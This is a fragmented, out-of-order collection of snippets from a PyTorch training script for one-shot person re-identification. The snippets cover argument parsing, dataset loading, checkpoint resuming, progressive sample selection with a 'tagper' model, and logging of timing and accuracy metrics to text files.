torch.nn.parallel import DistributedDataParallel as DDP from torch.utils.data.distributed", "one in config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' *", "print('save_path='+save_path) print('-' * 20 + 'config_info' + '-' * 20)", "labeled and unlabeled data for training dataset_all = datasets.create(args.dataset, osp.join(data_dir,", "torch.distributed as dist from torch.nn.parallel import DistributedDataParallel as DDP from", "for one in config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-'", "import warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import Logger import os.path as", ">=len(u_data): iter_mode=1 #切换模式 print('tagper is stop') else: #mode = 1", "select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) pred_y,", "Logger import os.path as osp import sys from torch.backends import", "select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper') #tagper存储路径. if not Path(tagper_path).exists():", "from my_reid import models import numpy as np import torch", "= osp.join(save_path,'tagper') #tagper存储路径. if not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径'''", "'a') # 保存性能数据. #特征空间中的性能问题. data_file = open(osp.join(save_path, 'data.txt'), 'a') #", "range(total_step): # for resume if step < resume_step: continue ratio", "= raw_select_pre print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data)))", "# 服务器 else: #本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir", "{:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close()", "# @File : atmpro1_vsm2.py # @Software: PyCharm # @Desc :", "\\t Logs-dir {}\".format( args.EF, step, nums_to_select, ratio, save_path)) # train", "except: continue # if need resume if start_step >= 0:", "open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper')", "@Email : <EMAIL> # @File : atmpro1_vsm2.py # @Software: PyCharm", "eug.resume(ckpt_file, step) # 只对eug进行性能评估 # mAP, rank1, rank5, rank10, rank20", "cudnn from my_reid.utils.serialization import load_checkpoint from torch import nn import", "default=10) parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name',", "u_data = get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init), init=args.init) resume_step, ckpt_file = -1,", "rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery) # 把数据写到data文件里. data_file.write('{}", "nums_to_select_tagper = int(len(u_data) * ratio_t) if nums_to_select >= len(u_data): break", "label_pre,dists= tagper.estimate_label_vsm() selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量 new_train_data, unselected_data, select_pre=", "服务器 else: #本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir =", "* args.EF /100 nums_to_select = int(len(u_data) * ratio) nums_to_select_tagper =", ": #!/usr/bin/python3.6 # -*- coding: utf-8 -*- # @Time :", "kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{}", "'--batch-size', type=int, default=16) parser.add_argument('-f', '--fea', type=int, default=1024) parser.add_argument('--EF', type=int, default=10)", "load_checkpoint from torch import nn import time import pickle import", "rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery) # 把数据写到data文件里. data_file.write('{} {:.2%} {:.2%}", "or load ckpt start_time = time.time() print(\"training reid model\") eug.train(new_train_data,", "len(dataset_all.train) l_data, u_data = get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init), init=args.init) resume_step, ckpt_file", "loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm() selected_idx =", "= 0 label_pre,select_pre = raw_label_pre,raw_select_pre end_time = time.time() step_time =", "resume if start_step >= 0: print(\"continued from iter step\", start_step)", "main(args): father = Path('/mnt/') if father.exists(): # 是在服务器上 data_dir =", "unlabeled data for training dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset)) num_all_examples", "1) * args.EF / 100 ratio_t = (step+1+args.t) * args.EF", "step) # 只对eug进行性能评估 # mAP, rank1, rank5, rank10, rank20 =", "def main(args): father = Path('/mnt/') if father.exists(): # 是在服务器上 data_dir", "0, 0, 0, 0, 0 mAP, rank1, rank5, rank10, rank20", "coding: utf-8 -*- # @Time : 2020/9/1 下午7:07 # @Author", "#直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre, raw_select_pre =", "保存性能数据. #特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t", "<EMAIL> # @File : atmpro1_vsm.py # @Software: PyCharm # @Desc", "pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm() selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量 new_train_data,", "# 保存性能数据. #特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r, select_pre_r,label_pre_t,", "#特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据.", "= t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper is stop')", "@Email : <EMAIL> # @File : atmpro1.py # @Software: PyCharm", "import nn import time import pickle import torch.distributed as dist", "到编号位置. total_step = 100 // args.EF + 1 sys.stdout =", "from my_reid.utils.serialization import load_checkpoint from torch import nn import time", "type=int, default=900) parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init', type=float, default=-1)", "-*- coding: utf-8 -*- # @Time : 2020/9/3 上午11:03 #", "# @Time : 2020/9/1 下午7:07 # @Author : Joselynzhao #", "'.txt')) dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. data_file", "config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' * 20 + 'config_info' + '-' *", "selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量 new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y)", "default=900) parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init', type=float, default=-1) parser.add_argument('-m',", "= eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y)", "#args.vsm_lambda的衰减 0.5 - 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1", "# kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data, step,", "unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre = label_pre,select_pre label_pre,select_pre = t_label_pre,t_select_pre", "step < resume_step: continue ratio = (step + 1) *", "1 # raw_select_pre = raw_select_pre_t # raw_select_pre_t = 0 label_pre,select_pre", "initial the EUG algorithm eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data,", "{}:\\t Nums_to_be_select {} \\t Ritio \\t Logs-dir {}\".format( args.EF, step,", "把数据写到data文件里. data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step, mAP, rank1, rank5,", "raw_select_pre_t = 0 label_pre,select_pre = raw_label_pre,raw_select_pre end_time = time.time() step_time", "= end_time - start_time total_time = step_time + total_time train_time_file.write('{}", "mAP, rank1, rank5, rank10, rank20 = 0, 0, 0, 0,", "= step_time + total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{}", "'--dataset', type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f', '--fea',", "default='Yes') parser.add_argument('--max_frames', type=int, default=900) parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init',", "== '__main__': parser = argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID') parser.add_argument('-d',", "'{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close() if __name__ ==", "parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name', type=str, default='atm') parser.add_argument('--exp_aim', type=str, default='for paper')", "@Desc : #!/usr/bin/python3.6 # -*- coding: utf-8 -*- # @Time", "osp import sys from torch.backends import cudnn from my_reid.utils.serialization import", "= eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data,", "args.EF /100 nums_to_select = int(len(u_data) * ratio) nums_to_select_tagper = int(len(u_data)", "Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else: #本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个", "np import torch import argparse import os import warnings warnings.filterwarnings(\"ignore\")", "= (step + 1) * args.EF / 100 ratio_t =", "'a') # 保存性能数据. #特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r,", "-50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre, raw_select_pre = label_pre,select_pre", "parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str, default='Yes') parser.add_argument('--max_frames', type=int, default=900)", "= 0, 0, 0, 0, 0 mAP, rank1, rank5, rank10,", "Nums_to_be_select {} \\t Ritio \\t Logs-dir {}\".format( args.EF, step, nums_to_select,", "argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID') parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names())", "select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre = label_pre,select_pre label_pre,select_pre = t_label_pre,t_select_pre if", "= raw_select_pre_t # raw_select_pre_t = 0 label_pre,select_pre = raw_label_pre,raw_select_pre end_time", "Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark = True cudnn.enabled = True save_path", "(step+1+args.t) * args.EF /100 nums_to_select = int(len(u_data) * ratio) nums_to_select_tagper", "min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre, raw_select_pre", "* args.EF / 100 ratio_t = (step+1+args.t) * args.EF /100", "+ str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file = open(osp.join(save_path, 'dataf.txt'),", "pred_y) t_label_pre,t_select_pre = label_pre,select_pre label_pre,select_pre = t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data):", "0: print(\"continued from iter step\", start_step) else: print(\"resume failed\", start_step,", "'--epochs', type=int, default=70) parser.add_argument('-s', '--step_size', type=int, default=55) parser.add_argument('--lamda', type=float, default=0.5)", "my_reid.utils.serialization import load_checkpoint from torch import nn import time import", "l_data, u_data = get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init), init=args.init) resume_step, ckpt_file =", "start_time total_time = step_time + total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time,", "2 #迭代模式,确定是否训练tagper for step in range(total_step): # for resume if", "是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器 logs_dir = Path('/mnt/home/{}'.format(args.log_name)) #", "data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step, mAP, rank1, rank5, rank10,", "parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str,", "# @Time : 2020/9/3 上午11:03 # @Author : Joselynzhao #", "rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery) # 把数据写到data文件里. data_file.write('{} {:.2%}", "eug.generate_new_train_data(selected_idx, pred_y) # kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data,", "raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t = raw_select_pre", "# if need resume if start_step >= 0: print(\"continued from", "step\", start_step) else: print(\"resume failed\", start_step, files) return start_step, ckpt_file", "-1, '' if args.resume: resume_step, ckpt_file = resume(save_path) # initial", "+args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select {} \\t", "in files: try: iter_ = int(pattern.search(filename).groups()[0]) print(iter_) if iter_ >", "start_time = time.time() print(\"training reid model\") eug.train(new_train_data, unselected_data, step, loss=args.loss,", "eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y) #", "config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for one in config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n')", "files = os.listdir(savepath) files.sort() for filename in files: try: iter_", "parser.add_argument('--exp_name', type=str, default='atm') parser.add_argument('--exp_aim', type=str, default='for paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2)", "start_step: start_step = iter_ ckpt_file = osp.join(savepath, filename) except: continue", "parser.add_argument('--init', type=float, default=-1) parser.add_argument('-m', '--momentum', type=float, default=0.5) parser.add_argument('-e', '--epochs', type=int,", "import sys from torch.backends import cudnn from my_reid.utils.serialization import load_checkpoint", "default=1024) parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order',", "re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file = \"\"", "# 只记录训练所需要的时间. # 数据格式为 step_time total_time. total_time = 0 #", "as np import torch import argparse import os import warnings", "torch.utils.data.distributed import DistributedSampler from pathlib import Path def resume(savepath): import", ">= 0: print(\"continued from iter step\", start_step) else: print(\"resume failed\",", "= int(len(u_data) * ratio) nums_to_select_tagper = int(len(u_data) * ratio_t) if", "else: #本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name))", "dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset)) num_all_examples = len(dataset_all.train) l_data, u_data", "< resume_step: continue ratio = (step + 1) * args.EF", "model or load ckpt start_time = time.time() print(\"training reid model\")", "{} \\t Ritio \\t Logs-dir {}\".format( args.EF, step, nums_to_select, ratio,", "if __name__ == '__main__': parser = argparse.ArgumentParser(description='Progressive Learning for One-Example", "parser.add_argument('-e', '--epochs', type=int, default=70) parser.add_argument('-s', '--step_size', type=int, default=55) parser.add_argument('--lamda', type=float,", "pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data)))", "label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper') #tagper存储路径. if not", "= get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init), init=args.init) resume_step, ckpt_file = -1, ''", "u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data = l_data unselected_data", "if iter_mode==2: raw_select_pre_t = raw_select_pre print(\"training tagper model\") selected_idx =", "pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else", "* ratio_t) if nums_to_select >= len(u_data): break #args.vsm_lambda的衰减 0.5 -", "failed\", start_step, files) return start_step, ckpt_file def main(args): father =", "= osp.join(savepath, filename) except: continue # if need resume if", "default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name', type=str, default='atm') parser.add_argument('--exp_aim',", "eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据.", "0 # get all the labeled and unlabeled data for", "type=int, default=10) parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0')", "PyCharm # @Desc : from my_reid.eug import * from my_reid", "@Author : Joselynzhao # @Email : <EMAIL> # @File :", "resume_step, ckpt_file = -1, '' if args.resume: resume_step, ckpt_file =", "# 服务器 logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else: #本地 data_dir", "= True save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # 到编号位置.", "embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data = l_data unselected_data = u_data iter_mode", "# -*- coding: utf-8 -*- # @Time : 2020/8/26 下午8:26", "True save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # 到编号位置. total_step", "ckpt_file = resume(save_path) # initial the EUG algorithm eug =", "parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str, default='Yes') parser.add_argument('--max_frames', type=int, default=900) parser.add_argument('--loss', type=str, default='ExLoss',", ": atmpro1.py # @Software: PyCharm # @Desc : from my_reid.eug", "下午8:26 # @Author : Joselynzhao # @Email : <EMAIL> #", "!= resume_step else eug.resume(ckpt_file, step) # 只对eug进行性能评估 # mAP, rank1,", "sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") + '.txt'))", "0 label_pre,select_pre = raw_label_pre,raw_select_pre end_time = time.time() step_time = end_time", "tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre = label_pre,select_pre label_pre,select_pre = t_label_pre,t_select_pre if nums_to_select_tagper", "__name__ == '__main__': parser = argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID')", "eug.evaluate(dataset_all.query, dataset_all.gallery) # 把数据写到data文件里. data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,", "0 # label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t = raw_select_pre print(\"training tagper", "mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery) # 把数据写到data文件里.", "label_pre,select_pre = raw_label_pre,raw_select_pre end_time = time.time() step_time = end_time -", "= time.time() print(\"training reid model\") eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs,", "len(u_data))) _, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y) # kf_file.write('{} {:.2%}", "label_pre, select_pre)) dataf_file.close() train_time_file.close() if __name__ == '__main__': parser =", "the model or load ckpt start_time = time.time() print(\"training reid", "ratio_t = (step+1+args.t) * args.EF /100 nums_to_select = int(len(u_data) *", "= datasets.create(args.dataset, osp.join(data_dir, args.dataset)) num_all_examples = len(dataset_all.train) l_data, u_data =", "import torch import argparse import os import warnings warnings.filterwarnings(\"ignore\") from", "train the model or load ckpt start_time = time.time() print(\"training", "save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data = l_data unselected_data =", "parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f', '--fea', type=int, default=1024) parser.add_argument('--EF', type=int,", "for training dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset)) num_all_examples = len(dataset_all.train)", "Path('/mnt/share/datasets/RE-ID/data') # 服务器 logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else: #本地", "pathlib import Path def resume(savepath): import re pattern = re.compile(r'step_(\\d+)\\.ckpt')", "= l_data unselected_data = u_data iter_mode = 2 #迭代模式,确定是否训练tagper for", "type=str, default='for paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str, default='Yes')", "for filename in files: try: iter_ = int(pattern.search(filename).groups()[0]) print(iter_) if", "init_lr=0.1) pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm() selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量", "nn import time import pickle import torch.distributed as dist from", "step_time = end_time - start_time total_time = step_time + total_time", "pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file = \"\" #", "dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. data_file =", "0.5 - 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing:", "# for resume if step < resume_step: continue ratio =", "= label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0", "default='0') parser.add_argument('--exp_name', type=str, default='atm') parser.add_argument('--exp_aim', type=str, default='for paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs')", "'' if args.resume: resume_step, ckpt_file = resume(save_path) # initial the", "nums_to_select >= len(u_data): break #args.vsm_lambda的衰减 0.5 - 0 vsm_lambda =", "* 20) config_file.close() train_time_file = open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间.", "pred_y) raw_label_pre, raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t =", "dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre=", "import time import pickle import torch.distributed as dist from torch.nn.parallel", "import re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step = -1 ckpt_file =", "eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea,", "# 本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark = True", "只对eug进行性能评估 # mAP, rank1, rank5, rank10, rank20 = 0, 0,", "<reponame>joselynzhao/One-shot-Person-Re-ID-ATM<gh_stars>1-10 #!/usr/bin/python3.6 # -*- coding: utf-8 -*- # @Time :", "# @Email : <EMAIL> # @File : atmpro1.py # @Software:", "pred_score, label_pre,dists= tagper.estimate_label_vsm() selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量 new_train_data, unselected_data,", "= open(osp.join(save_path, 'time.txt'), 'a') # 只记录训练所需要的时间. # 数据格式为 step_time total_time.", "torch import argparse import os import warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging", "import os import warnings warnings.filterwarnings(\"ignore\") from my_reid.utils.logging import Logger import", "'config_info' + '-' * 20) config_file.close() train_time_file = open(osp.join(save_path, 'time.txt'),", "from torch import nn import time import pickle import torch.distributed", "key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' * 20 + 'config_info'", "int(len(u_data) * ratio) nums_to_select_tagper = int(len(u_data) * ratio_t) if nums_to_select", "end_time = time.time() step_time = end_time - start_time total_time =", "int(pattern.search(filename).groups()[0]) print(iter_) if iter_ > start_step: start_step = iter_ ckpt_file", "time.time() print(\"training reid model\") eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size,", "type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init', type=float, default=-1) parser.add_argument('-m', '--momentum', type=float,", "采样目标数量 new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre = label_pre,select_pre label_pre,select_pre", "EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda)", "import torch.distributed as dist from torch.nn.parallel import DistributedDataParallel as DDP", "open(osp.join(save_path, 'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for one in", "my_reid.eug import * from my_reid import datasets from my_reid import", "'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for one in config_info:", "# 把数据写到data文件里. data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step, mAP, rank1,", "def resume(savepath): import re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step = -1", "* 20 + 'config_info' + '-' * 20) config_file.close() train_time_file", "= \"\" # find start step files = os.listdir(savepath) files.sort()", "rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2", "import DistributedDataParallel as DDP from torch.utils.data.distributed import DistributedSampler from pathlib", "father.exists(): # 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器 logs_dir =", "+ 1) * args.EF / 100 ratio_t = (step+1+args.t) *", "@Time : 2020/8/26 下午8:26 # @Author : Joselynzhao # @Email", "algorithm eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames,", "#tagper存储路径. if not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file", "t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper is stop') else:", ": atmpro1_vsm.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6 #", "= os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # 到编号位置. total_step = 100", "import os.path as osp import sys from torch.backends import cudnn", "-*- coding: utf-8 -*- # @Time : 2020/9/1 下午7:07 #", "from my_reid.eug import * from my_reid import datasets from my_reid", "nums_to_select, ratio, save_path)) # train the model or load ckpt", "step_size=args.step_size, init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step) #", "if args.resume: resume_step, ckpt_file = resume(save_path) # initial the EUG", "DistributedDataParallel as DDP from torch.utils.data.distributed import DistributedSampler from pathlib import", "0, 0, 0, 0 mAP, rank1, rank5, rank10, rank20 =", "models import numpy as np import torch import argparse import", "from torch.utils.data.distributed import DistributedSampler from pathlib import Path def resume(savepath):", "# @Desc : from my_reid.eug import * from my_reid import", "{:.2%} {:.2%}\\n'.format(step, mAP, rank1, rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm()", "type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name', type=str, default='atm')", "config_file = open(osp.join(save_path, 'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',') config_info.sort() for", "* from my_reid import datasets from my_reid import models import", "u_data=u_data, save_path=save_path, 